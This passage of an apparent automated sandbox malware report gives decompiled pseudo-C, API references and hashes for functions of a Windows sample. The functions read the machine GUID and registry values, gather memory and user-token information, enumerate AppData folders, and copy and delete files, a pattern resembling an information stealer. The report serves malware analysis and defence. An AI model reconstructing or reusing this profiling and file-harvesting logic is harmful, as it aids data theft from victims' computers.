				if(_t163 != 0) {
					_t164 = _t163 + 0x10;
					_t55 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e1f0);
					__eflags = _t55;
					if(_t55 == 0) {
						L5:
						_v16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t164, _t174) + _t57);
						_t60 = E0040A3E4(_t164,  &_v16, 0, _t127);
						__eflags = _t60;
						if(_t60 != 0) {
							_t166 = _t164 + _t127 * 2 + 2;
							_t64 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t166) + _t62);
							_v8 = _t64;
							_t179 =  *((intOrPtr*)( *0x40e18c))(_t166,  *0x40e20c) - _t166 >> 1;
							_t67 = E0040A3E4(_t166,  &_v8, 0, _t179);
							__eflags = _t67;
							if(_t67 != 0) {
								_t168 = _t166 + _t179 * 2 + 2;
								_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t168) + _t69);
								_v12 = _t71;
								__eflags = E0040A3E4(_t168,  &_v12, 0,  *((intOrPtr*)( *0x40e18c))(_t168,  *0x40e20c) - _t168 >> 1);
								if(__eflags != 0) {
									_t78 = LocalAlloc(0x40, 0x5000); // executed
									_a4 =  *((intOrPtr*)( *0x40e13c))(_t78, _v8);
									E00409064(__eflags,  &_a4);
									E0040919C( &_a4); // executed
									E004090DC( *0x40e13c,  &_a4); // executed
									E00409265( &_a4);
									E004092CF( &_v12,  &_a4); // executed
									E0040942A( &_a4); // executed
									E00409206(__eflags,  &_a4);
									E00409498( &_a4);
									E00409581(__eflags,  &_a4, _v12); // executed
									_t144 = _a4;
									_v36 = _v16;
									_v32 = _t144;
									_v28 = 0;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t100 =  *((intOrPtr*)( *0x40e08c))(_t144);
									__eflags = _t100 - 0x40;
									if(_t100 > 0x40) {
										_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t158 = 0x10;
										_t109 = E0040A05F(_t107, _t158);
										_v24 = _t109;
										_t110 =  *((intOrPtr*)( *0x40e13c))(_t108,  *0x40e210);
										_t173 = _v24;
										_t111 = E0040A503(_t110, _t173);
										_t149 =  *0x40e204; // 0x4e5e00
										_v28 = _v28 & 0x00000000;
										_v32 = _t149;
										_v24 = _t111;
										_t112 = E00408619( &_v24);
										_v20 = _t112;
										_t184 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, 0, 0, 0, 0);
										__eflags = 0;
										if(0 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, _t184, 0, 0, 0);
											__eflags = 0;
											if(0 != 0) {
												E00407EDB(_a8, _t184, 1,  &_v60, 0, 0, _v20,  &_v32); // executed
											}
										}
										LocalFree(_t184);
										LocalFree(_v20);
										LocalFree(_v24);
										LocalFree(_t173);
									}
									LocalFree(_a4); // executed
									LocalFree(_v8);
									LocalFree(_v12); // executed
									L19:
									LocalFree(_v16);
									_t105 = 1;
									L20:
									return _t105;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								L9:
								_push(0xfffffffc);
								L10:
								_pop(1);
								goto L19;
							}
							LocalFree(_v8);
							goto L9;
						}
						_push(0xfffffffd);
						goto L10;
					}
					_t133 = _t55 - _t164;
					__eflags = _t133;
					_t127 = _t133 >> 1;
					if(_t133 >= 0) {
						goto L5;
					}
					_t105 = 0xfffffffe;
					goto L20;
				}
				_t105 = _t53 | 0xffffffff;
				goto L20;
			}

0x00409919
0x0040991e
0x00409920
0x00409924
0x00409939
0x0040993d
0x0040993f
0x00409941
0x00409953
0x0040996f
0x00409974
0x0040997b
0x0040997d
0x00409991
0x0040999c
0x004099a4
0x004099b8
0x004099be
0x004099c5
0x004099c7
0x004099e8
0x004099f3
0x004099fb
0x00409a18
0x00409a1a
0x00409a36
0x00409a44
0x00409a4b
0x00409a54
0x00409a5d
0x00409a66
0x00409a6f
0x00409a78
0x00409a81
0x00409a8a
0x00409a96
0x00409a9b
0x00409aa7
0x00409aaf
0x00409ab2
0x00409ab5
0x00409ab7
0x00409ab8
0x00409ab9
0x00409abe
0x00409ac1
0x00409ad4
0x00409ae1
0x00409ae5
0x00409aea
0x00409afc
0x00409aff
0x00409b01
0x00409b08
0x00409b0d
0x00409b13
0x00409b17
0x00409b1d
0x00409b20
0x00409b32
0x00409b3d
0x00409b4e
0x00409b50
0x00409b52
0x00409b69
0x00409b6b
0x00409b6d
0x00409b84
0x00409b89
0x00409b6d
0x00409b8d
0x00409b96
0x00409b9f
0x00409ba6
0x00409ba6
0x00409baf
0x00409bb8
0x00409bc1
0x00409bc7
0x00409bca
0x00409bd0
0x00409bd3
0x00409bd6
0x00409bd6
0x00409a1f
0x004099cc
0x004099cc
0x004099d2
0x004099d4
0x004099d4
0x00000000
0x004099d4
0x004099cc
0x00000000
0x004099cc
0x0040997f
0x00000000
0x0040997f
0x00409945
0x00409945
0x00409947
0x00409949
0x00000000
0x00000000
0x0040994d
0x00000000
0x0040994d
0x00409926
0x00000000

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 823b0d16673dee3de935993e7c46dd941d23d6ac542f114209c353ad5b495304
Instruction ID: d553b19b407f17417f5105702fe08a0418c2ec115b386657b372b4e652bae7b9
Opcode Fuzzy Hash: 823b0d16673dee3de935993e7c46dd941d23d6ac542f114209c353ad5b495304
Instruction Fuzzy Hash: FA81D5B1900205BFDB00DBA6DD45DAE7BB9EB84310B00493AF914F72D1DB78AD11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405FEB Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 274memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004E5BE0,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?), ref: 0040615C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406221

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 0040622B
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406270
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062C7
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062CE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406325
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 0040632F

Strings

[N, xrefs: 00406116

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$lstrlen$Alloc$Global
String ID: [N
API String ID: 2878369382-739933332
Opcode ID: 88be271c9a3ae40306a79d0cf913d625e6cf91e891778e6da8720978225ce7ad
Instruction ID: ff6bad65333e8fe1a3c55b3bcf1dec483b74064a970dacde523e554a8e1a11d4
Opcode Fuzzy Hash: 88be271c9a3ae40306a79d0cf913d625e6cf91e891778e6da8720978225ce7ad
Instruction Fuzzy Hash: 78A1A872504301ABDB14DF65DD8096BBBF5FF88300F01492DFA59A72A0D775E820CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0BE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040A0BE() {
				long _v8;
				void* _v12;
				signed int _v16;
				int _t20;
				int _t24;
				int _t28;
				void* _t35;
				union _TOKEN_INFORMATION_CLASS _t38;

				_v8 = _v8 & 0x00000000;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) == 0) {
					L8:
					return 0;
				}
				_t38 = 1;
				_t20 = GetTokenInformation(_v12, 1, 0, _v8,  &_v8); // executed
				if(_t20 != 0 || GetLastError() == 0x7a) {
					_t35 =  *((intOrPtr*)( *0x40e094))(0x40, _v8);
					_t24 = GetTokenInformation(_v12, _t38, _t35, _v8,  &_v8); // executed
					if(_t24 == 0) {
						goto L8;
					}
					_v16 = _v16 & 0x00000000;
					_push( &_v16);
					_push( *_t35);
					if( *((intOrPtr*)( *0x40e058))() == 0) {
						goto L8;
					}
					_t28 = lstrcmpiW( *0x40e464, _v16); // executed
					if(_t28 != 0) {
						_t38 = 0;
					}
					GlobalFree(_t35);
					return _t38;
				} else {
					goto L8;
				}
			}

0x0040a0c4
0x0040a0e1
0x0040a169
0x00000000
0x0040a169
0x0040a0f7
0x0040a0fc
0x0040a100
0x0040a11f
0x0040a12d
0x0040a131
0x00000000
0x00000000
0x0040a133
0x0040a13f
0x0040a140
0x0040a146
0x00000000
0x00000000
0x0040a156
0x0040a15a
0x0040a15c
0x0040a15c
0x0040a15f
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0040A0D6
OpenProcessToken.ADVAPI32(00000000,?,iqroq5112542785672901323), ref: 0040A0DD
GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,iqroq5112542785672901323), ref: 0040A0FC
GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 0040A102
GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,iqroq5112542785672901323), ref: 0040A12D
lstrcmpiW.KERNEL32(00000000,?,iqroq5112542785672901323), ref: 0040A156
GlobalFree.KERNEL32(00000000), ref: 0040A15F

Strings

iqroq5112542785672901323, xrefs: 0040A0CB

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$CurrentErrorFreeGlobalLastOpenlstrcmpi
String ID: iqroq5112542785672901323
API String ID: 2598388208-2937663778
Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction ID: 15eb1b3bc6c873a00f883c6e6f8e066a9c9a871e93fd9db043f72c5c5a2fc382
Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction Fuzzy Hash: 51118135900215FBDB119BE6DE44EAFBBB8EB48750F040475E900F61A0DB74DE24DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00403760 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 200fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039CB

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 00403867
DeleteFileW.KERNEL32(?), ref: 004039AA
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 004039BA
LocalFree.KERNEL32(?,?,?,?,00000000), ref: 004039C1

Strings

@[N, xrefs: 00403936, 0040395F, 0040396E

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FileFreeLocal$Delete$Copy
String ID: @[N
API String ID: 2498017937-1206959322
Opcode ID: 2887cd1b965e8c1fd80b588964d614a9ad5f8ca9391292049183dc8960f1e9c0
Instruction ID: 855b80ec5d303092bec4e067a8265e7fa441cfeb4fa3f9afbe0cd358cb9c57d7
Opcode Fuzzy Hash: 2887cd1b965e8c1fd80b588964d614a9ad5f8ca9391292049183dc8960f1e9c0
Instruction Fuzzy Hash: EF718D71500210EFDB059FA6EE84A5E3BB9FB48310B104979F925F72E0DB74DA208B5A

Uniqueness

Uniqueness Score: -1.00%

Function 004090DC Relevance: 10.6, APIs: 7, Instructions: 68
registryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E004090DC(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				int _v12;
				long _t11;
				void* _t14;
				signed int _t20;
				void* _t24;
				void* _t25;
				void* _t32;
				void* _t33;
				void* _t35;
				intOrPtr* _t37;

				_v12 = 0x104;
				_t33 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208, _t32, _t35, _t24, __ecx, __ecx);
				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
				_t11 = RegOpenKeyExW(0x80000002,  *0x40e298, 0, 0x20119,  &_v8); // executed
				if(_t11 == 0) {
					RegQueryValueExW(_v8,  *0x40e448, 0, 0, _t33,  &_v12); // executed
				}
				RegCloseKey(_v8);
				_t14 =  *((intOrPtr*)( *0x40e08c))(_t33);
				_push(_t33);
				if(_t14 > 0) {
					wsprintfW(_t25,  *0x40e32c);
					_t37 = _a4;
					 *_t37 = E0040A503( *_t37, _t25);
					LocalFree(_t33);
					LocalFree(_t25);
					_t20 = 1;
				} else {
					_t20 = LocalFree() | 0xffffffff;
				}
				return _t20;
			}

0x004090f0
0x004090ff
0x00409110
0x00409129
0x0040912d
0x0040913f
0x0040913f
0x00409148
0x00409154
0x00409156
0x00409159
0x0040916d
0x00409173
0x00409183
0x00409185
0x0040918c
0x00409194
0x0040915b
0x00409161
0x00409161
0x00409199

APIs

RegOpenKeyExW.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00409A62,00000000), ref: 00409129
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,00000104,?,?,?,00409A62,00000000), ref: 0040913F
RegCloseKey.ADVAPI32(00000000,?,?,?,00409A62,00000000), ref: 00409148
LocalFree.KERNEL32(00000000,?,?,?,00409A62,00000000), ref: 0040915B
wsprintfW.USER32 ref: 0040916D

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,00000000), ref: 00409185
LocalFree.KERNEL32(00000000), ref: 0040918C

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrlen$AllocCloseGlobalOpenQueryValuewsprintf
String ID:
API String ID: 660617932-0
Opcode ID: e7309cc0036a2c61331d2b52a6aee609973f60ba401e8f0191633dded93efb61
Instruction ID: e9f177af51a582558b006cd38ce564a6bd3d86c6e4fd3138e243791f8522013c
Opcode Fuzzy Hash: e7309cc0036a2c61331d2b52a6aee609973f60ba401e8f0191633dded93efb61
Instruction Fuzzy Hash: 8E119372600110BBE7049BA7ED49E5BBFBCEB49350B104839F609F61A1D6B45D20CB79

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403F9D(void* __ecx, intOrPtr __edx, char _a4, char _a8) {
				void* _t7;
				void* _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;

				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228, _t26, _t30, _t16, __ecx);
				_t7 =  *((intOrPtr*)( *0x40e044))(0x40, 0x228);
				_t28 = _t7;
				 *0x40e0c4(0, _t17, 0x1c, 0);
				 *0x40e0c4(0, _t28, 0x1a, 0);
				_t1 =  &_a8; // 0x407b38
				E00401B05(_t17,  *_t1, __edx, _a4, 0);
				_t3 =  &_a8; // 0x407b38
				E0040196E(_t28,  *_t3, __edx, _a4, 0); // executed
				if(_t17 != 0) {
					LocalFree(_t17);
				}
				if(_t28 != 0) {
					LocalFree(_t28);
				}
				return 1;
			}

0x00403fbe
0x00403fc3
0x00403fcc
0x00403fce
0x00403fdb
0x00403fe1
0x00403fec
0x00403ff1
0x00403fff
0x00404009
0x0040400c
0x0040400c
0x00404014
0x00404017
0x00404017
0x00404026

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00407B38,00000000,00000000), ref: 00403FCE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,?,00407B38,00000000,00000000), ref: 00403FDB

Part of subcall function 00401B05: FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401B5B

Part of subcall function 0040196E: FindFirstFileW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004019C6

LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 0040400C
LocalFree.KERNEL32(00000000,?,?,?,00407B38,00000000,00000000), ref: 00404017

Strings

8{@, xrefs: 00403FE1, 00403FF1

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FileFindFirstFolderFreeLocalPathSpecial
String ID: 8{@
API String ID: 1746351402-1865321623
Opcode ID: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction ID: 72fdba0f78f482ba83b50744195af73f567e22cf42767fcd2574695d6fb78c79
Opcode Fuzzy Hash: faabf291c3588ec38a8ee4fb6b6ae69e583b51ce6e94b49b7ce2d95358603802
Instruction Fuzzy Hash: 600128713402047BF7205F929D4AF6B3768DBC5B11F044138FB18BB2D1DAB49C1086AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040A5FA() {
				void* _v8;
				int _v12;
				int _v16;
				long _t11;
				long _t14;
				char* _t19;

				_t19 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v12 = 0x104;
				_v16 = 1;
				_t11 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119,  &_v8); // executed
				_t14 = RegQueryValueExW(_v8,  *0x40e278, 0,  &_v16, _t19,  &_v12); // executed
				if(_t11 != 0 || _t14 != 0) {
					RegCloseKey(_v8);
				}
				return _t19;
			}

0x0040a616
0x0040a61b
0x0040a634
0x0040a63b
0x0040a659
0x0040a65d
0x0040a666
0x0040a666
0x0040a671

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 0040A63B
RegQueryValueExW.KERNEL32(?,00000000,00000001,00000000,00000104), ref: 0040A659
RegCloseKey.ADVAPI32(?), ref: 0040A666

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0040A62A

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 3677997916-1514646153
Opcode ID: 1233372230aca0e7df5d087625ad0dd89436495b9e8128ba46b7d0fdcd860ef1
Instruction ID: b7295adda02a32b73446885dd9b7f16e439bc7fa4040cb3c3f6055cefdfb8544
Opcode Fuzzy Hash: 1233372230aca0e7df5d087625ad0dd89436495b9e8128ba46b7d0fdcd860ef1
Instruction Fuzzy Hash: F2F0F4B6A00214BBEB148BA5ED46FDE7BB8EB84700F040075FB00F22D0C6B09E14CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041FAB0 Relevance: 6.3, APIs: 4, Instructions: 326COMMON

Download Yara Rule

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041FB3B

Part of subcall function 00415840: __calloc_dbg_impl.LIBCMTD ref: 00415867
Part of subcall function 00415840: __errno.LIBCMTD ref: 0041587E
Part of subcall function 00415840: __errno.LIBCMTD ref: 00415887

__nh_malloc_dbg.LIBCMTD ref: 0041FC67

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno__nh_malloc_dbg$__calloc_dbg_impl
String ID:
API String ID: 2503616996-0
Opcode ID: 778e38bc6efd97f1c7f924d20f97de91371a753f1577105e6e19857a5e9c0ec2
Instruction ID: 917154f0986699b353dad1ef751c0d4a147727080a5085d724b1d19719880e11
Opcode Fuzzy Hash: 778e38bc6efd97f1c7f924d20f97de91371a753f1577105e6e19857a5e9c0ec2
Instruction Fuzzy Hash: A4E11C74E04248CFDB24CFA4D894BADFBB1BB49314F24826ED8666B392D7349846CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040A503 Relevance: 5.0, APIs: 4, Instructions: 38
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040A503(WCHAR* __ecx, WCHAR* __edx) {
				WCHAR* _v8;
				void* __ebx;
				void* __esi;
				int _t7;
				void* _t10;
				WCHAR* _t16;
				void* _t32;

				_push(__ecx);
				_t16 = __edx;
				_v8 = __ecx;
				_t7 = lstrlenW(__edx);
				_t3 = lstrlenW(_v8) + 0x80; // 0x80
				_t10 = LocalAlloc(0x40, _t3 + _t7 + _t3 + _t7); // executed
				_t32 = _t10;
				E0040185F(_t32, _t28, _v8);
				E0040188C(_t16, _t32, _t28, _t32, _t16);
				GlobalFree(_v8); // executed
				return _t32;
			}

0x0040a506
0x0040a510
0x0040a513
0x0040a516
0x0040a525
0x0040a533
0x0040a538
0x0040a53e
0x0040a548
0x0040a550
0x0040a55c

APIs

lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
GlobalFree.KERNEL32(?), ref: 0040A550

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocFreeGlobalLocal
String ID:
API String ID: 3873415381-0
Opcode ID: 7439b9250609968e6e63ff34dd066d63b489fcc9440e39b785881af818bd08f0
Instruction ID: a16c6b1f1c1aff7e88faa53ff7a807ce8724a9faba81c89562836050573d755b
Opcode Fuzzy Hash: 7439b9250609968e6e63ff34dd066d63b489fcc9440e39b785881af818bd08f0
Instruction Fuzzy Hash: DCF02472700014FFCB04A79A9D45DAEF7AEEFC4340B144076E900F3321DAB09E018AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041556A Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156F9
_memset.LIBCMT ref: 00415716
_memset.LIBCMT ref: 00415731

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 69410c4095798773577b1bc710edf945ef39628d419657129ea33efc134ce160
Instruction ID: 23e798914de5c24cc93c4aaee41f7ebc1c487050272a37944d5bfb3b0d472494
Opcode Fuzzy Hash: 69410c4095798773577b1bc710edf945ef39628d419657129ea33efc134ce160
Instruction Fuzzy Hash: 7551FCB4A01204DFCB18CF45D995BDA77F1BB88315F24816AE9156B391D335EE80CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3E4 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040A3E4(intOrPtr __ecx, intOrPtr* __edx, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _t18;
				void _t25;
				void* _t26;
				intOrPtr* _t27;
				intOrPtr _t29;
				signed int _t31;
				void* _t33;
				void* _t34;
				signed int _t35;
				void* _t37;
				void* _t39;

				_t27 = __edx;
				_v12 = __edx;
				_v8 = __ecx;
				_t18 = LocalAlloc(0x40, 0x80 +  *((intOrPtr*)( *0x40e08c))(__ecx, _t34, _t37, _t26, __ecx, __ecx) * 2); // executed
				_t31 = _a4;
				_t39 = _t18;
				_t35 = _a8;
				if(_t31 < _t35) {
					_t29 = _v8;
					_t33 = _t39;
					do {
						_t25 =  *((intOrPtr*)(_t29 + _t31 * 2));
						_t31 = _t31 + 1;
						 *_t33 = _t25;
						_t33 = _t33 + 2;
					} while (_t31 < _t35);
					_t27 = _v12;
				}
				 *((short*)(_t39 + 2 + _t35 * 2)) = 0;
				 *_t27 =  *((intOrPtr*)( *0x40e13c))( *_t27, _t39);
				if(_t39 != 0) {
					LocalFree(_t39);
				}
				return 1;
			}

0x0040a3f6
0x0040a3fa
0x0040a3fd
0x0040a40c
0x0040a40e
0x0040a411
0x0040a413
0x0040a418
0x0040a41a
0x0040a41d
0x0040a41f
0x0040a41f
0x0040a423
0x0040a424
0x0040a427
0x0040a42a
0x0040a42e
0x0040a42e
0x0040a436
0x0040a442
0x0040a446
0x0040a449
0x0040a449
0x0040a456

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

Strings

y@, xrefs: 0040A434

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$AllocFree
String ID: y@
API String ID: 2012307162-1812993971
Opcode ID: ccb5b4be9ee1bd7769a826cb499616f7c5e28c2612ab748d711503cbdb706c51
Instruction ID: f3cb8fed4fc86e8926e4ae745f77bd99f1ad2e4c346b1d96af304dd36abb34b3
Opcode Fuzzy Hash: ccb5b4be9ee1bd7769a826cb499616f7c5e28c2612ab748d711503cbdb706c51
Instruction Fuzzy Hash: 8501D475610224AFDB15CF99DC80DAE77F9EF8C720B10856AE905E7310E770AD11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040942A Relevance: 4.5, APIs: 3, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040942A(intOrPtr* _a4) {
				struct _MEMORYSTATUSEX _v68;
				signed int _t10;
				void* _t26;
				void* _t27;
				int _t29;
				intOrPtr* _t30;

				_t10 =  *0x40e02c;
				_t29 = 0x40;
				_v68.dwLength = _t29;
				GlobalMemoryStatusEx( &_v68); // executed
				if(_t10 != 0) {
					_t27 =  *((intOrPtr*)( *0x40e044))(_t29, 0x400, _t26);
					wsprintfW(_t27,  *0x40e290, (_v68.ullAvailPhys << 0x00000020 | _v68.ullTotalPhys) >> 0x14, _v68.ullAvailPhys >> 0x14);
					_t30 = _a4;
					 *_t30 = E0040A503( *_t30, _t27);
					LocalFree(_t27);
					return 1;
				}
				return _t10 | 0xffffffff;
			}

0x00409430
